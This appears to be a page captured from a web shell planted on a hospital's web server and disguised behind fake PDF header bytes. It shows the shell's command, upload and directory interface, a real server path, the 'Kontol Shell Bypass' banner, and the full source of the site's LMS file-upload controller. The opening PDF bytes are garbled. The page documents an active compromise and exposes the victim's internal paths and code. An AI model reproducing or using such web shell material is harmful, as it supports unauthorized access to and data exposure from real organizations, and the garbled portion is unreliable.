%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :
ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/lms/lms/api/application/controllers/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/lms/lms/api/application/controllers/Files.php
<?php
class Files extends MY_Controller {
    function __construct() {
        parent::__construct();
		not_logged_res(); 
		$this->checkAccess(['manage_files', 'view_files']);
		$this->load->model("files_model", "file");
    }
	
	function lists(){
		$data=$this->file->lists();
		$data['cats']=$this->file->cats();
		$this->json_data($data, true);
	}
	
	function save(){
		$this->checkAccess('manage_files');
		$inf=array('success'=>'F', 'msg'=>'Error!');
		$post=trim_array($this->input->post());

		$id=$post['id']=intval($post['id']);
		$this->form_validation->set_rules('cat_id', 'Category', 'required', $this->req);
		$this->form_validation->set_rules('title', 'Title', 'required', $this->req);
		if(!$id && empty($_FILES['file']['name'])){
			$this->form_validation->set_rules('file', 'File', 'required');
		}
		
		if(@$this->form_validation->run() == FALSE){
			$inf['errors']=$this->form_validation->get_errors();
			$inf['msg']=reset($inf['errors']);
		}else{
			/** File upload */
			if(!is_dir(UP_PATHF.'files/')){
				mkdir(UP_PATHF.'files/', 0777, true);
			}
			if(!$id){
				$this->load->library('upload');
				$config=array(
					'upload_path'=>UP_PATHF.'files/', 
					'allowed_types'=>'gif|jpg|jpeg|png|pdf|doc|xls|ppt|docx|xlsx|pptx|mp4|webp|mkv|avi|mov', 
					'max_size'=>'102400',
					'max_filename'=>80,
					'file_ext_tolower'=>true,
				);
				$this->upload->initialize($config);
				if($this->upload->do_upload('file')){
					$post['file_name']=$this->upload->data('file_name');
					$post['file_ext']=$this->upload->data('file_ext');
					$post['file_size']=$this->upload->data('file_size');
					$post['is_image']=$this->upload->data('is_image');
					$post['is_pdf']=$post['file_ext']==='.pdf'?1:0;
				}else{
					$inf['msg']=strip_tags($this->upload->display_errors());
					$this->json_data($inf);
				}
			}
			/** \ */

			$data=filter_value($post, array('id', 'cat_id', 'title', 'file_name', 'file_ext', 'file_size', 'is_image', 'is_pdf'));
			if($this->common->save($data, "files")){
				$inf['success']='T';
				$inf['msg']='File '.($id?'updated':'uploaded').' successfully';
			}
		}
		$this->json_data($inf);
	}
	
	function detail($id=0){
		$dtl=$this->file->detail($id);
		$this->json_data($dtl);
	}
	
	function delete(){
		$this->checkAccess('manage_files');
		$inf=array('success'=>'F', 'msg'=>'Can not deleted!');
		$id=intval($this->input->post('id'));
		$file=$this->db->select("file_name")->get_where("files", array('id'=>$id))->row()->file_name;
		if($this->file->delete($id)>0){
			if($file){
				del_file(UP_PATHF.'files/'.$file);
			}
			$inf['success']='T';
			$inf['msg']="File deleted successfully";
		}
		$this->json_data($inf);
	}

	function saveCats(){
		$this->checkAccess('manage_files');
		$res=['success'=>0, 'msg'=>'Error!'];
		$post=trim_array($this->input->post());

		if(!$post['title']){
			$res['msg']="Categories names required";
			json_data($res);
		}
		if(!is_array($post['title'])){
			$res['msg']="Invalid data!";
			json_data($res);
		}

		$data=[];
		foreach($post['title'] as $i=>$v){
			$title=trim($v);
			if(!$title){
				$res['msg']="Category name rquired. Row Number# ".($i+1);
				json_data($res);
			}

			$data[]=['id'=>(int)$post['id'][$i], 'title'=>$title];
		}

		if($this->file->saveCats($data)){
			$res['success']=1;
			$res['msg']="Categories saved";
			$res['cats']=$this->file->cats();
		}

		json_data($res);
	}

	/** */
	function upload(){
        $res=['code'=>400, 'message'=>'Error!'];
        $dir=UP_PATHF.'files_new/';
        if(!is_dir($dir)){
            mkdir($dir, 0777, true);
        }

        
        $this->load->library('upload');
        $config=[
            'upload_path'=>$dir, 
            'allowed_types'=>'gif|jpg|jpeg|png|pdf|doc|xls|ppt|docx|xlsx|pptx|mp4|webp|mkv|avi|mov', 
            'max_size'=>'1024000',
            'max_filename'=>80,
            'file_ext_tolower'=>true,
            'file_name'=>USER_ID.time()
        ];
        $this->upload->initialize($config);
        if($this->upload->do_upload('file')){
            $data['file_name']=$this->upload->data('file_name');
            $data['file_ext']=$this->upload->data('file_ext');
            $data['file_size']=$this->upload->data('file_size');
            $data['is_image']=$this->upload->data('is_image');
            $data['is_pdf']=$post['file_ext']==='.pdf'?1:0;

            if($id=$this->dba->save("files_new", $data)){
                $res['file']=$data;
                $res['code']=200;
                $res['message']='';
                $res['file_id']=(int)$id;
                $res['file_url']=UP_URLF.'files_new/'.$data['file_name'];
            }
        }else{
            $res['message']=strip_tags($this->upload->display_errors());
            $res['file']=$_FILES;
        }

        jsonData($res);
    }
}

//EOF

Kontol Shell Bypass